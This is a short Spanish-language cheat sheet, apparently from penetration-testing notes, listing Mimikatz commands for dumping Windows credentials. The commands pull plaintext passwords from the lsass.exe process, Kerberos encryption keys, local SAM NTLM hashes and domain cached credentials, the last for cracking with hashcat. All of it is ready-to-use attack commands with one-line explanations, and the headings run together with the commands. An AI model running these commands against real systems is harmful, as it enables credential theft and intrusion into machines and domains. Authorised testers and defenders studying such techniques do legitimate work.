Mimikatz
Note
Los siguiente comandos requieren privilegios de Admin en el sistema.
LSASS
Dump passwords del proceso lsass.exe.
mimikatz sekurlsa::logonpasswordsKerberos ekeys
Dump Kerberos encryption keys para realizar diferentes tipos de ataques a kerberos.
mimikatz sekurlsa::ekeysSAM
Dump NTLM hash del sistema Local.
mimikatz lsadump::samDomain Cached Credentials (DCC)
Dump Domain Cached Credentials para intentar crackear el hash usando hashcat.
mimikatz lsadump::cache